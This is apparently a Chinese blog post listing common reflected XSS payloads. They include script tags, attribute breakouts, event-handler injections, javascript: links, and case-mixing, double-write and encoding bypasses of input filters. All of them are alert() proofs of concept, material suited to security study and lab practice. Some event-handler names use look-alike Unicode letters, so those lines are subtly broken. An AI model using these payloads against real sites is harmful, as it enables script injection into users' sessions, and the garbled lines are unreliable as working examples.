反射型xss的常用语法

Xss反射型常用语法:

  1. 普通语法: <script>alert(1)</script>
  2. 构造闭合语法: "><script>alert(1)</script>
  3. 当引号被转义时的语法: 1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
  4. 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
  5. 当</>被过滤时便不能用标签可以考虑使用出发事件: 1" οnmοuseοver="alert(1)"
  6. 当5.的双引号不行时则考虑使用单引号: 1' οnmοuseοver='alert(1)'
  7. 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
  8. 大小写绕过:11"><a HREF="javascript:alert(1)"> "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

10.Html编码绕过:

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如

href href

SCRIPT SCRIPT

相关推荐
w236173460117 小时前
存储型XSS漏洞解析
数据库·oracle·xss·存储型xss
予安灵1 天前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
wordbaby3 天前
网页防篡改 和 流量攻击防护 的具体方案
后端·xss
SuperherRo4 天前
Web开发-JS应用&VueJS框架&Vite构建&启动打包&渲染XSS&源码泄露&代码审计
前端·javascript·vue.js·xss·源码泄露·启动打包
风之旅人-d49 天前
XSS复现漏洞简单前八关靶场
前端·安全·xss
myrouya10 天前
XSS通关技巧
前端·xss
l1x1n011 天前
XSS 攻击向量与绕过技巧
前端·xss
qq_4170146011 天前
xss跨站之原理分类及攻击手法
前端·xss
高显11 天前
XSS介绍&通关XSS-Labs靶场
前端·xss
智商不在服务器13 天前
XSS 绕过分析:一次循环与两次循环的区别
前端·xss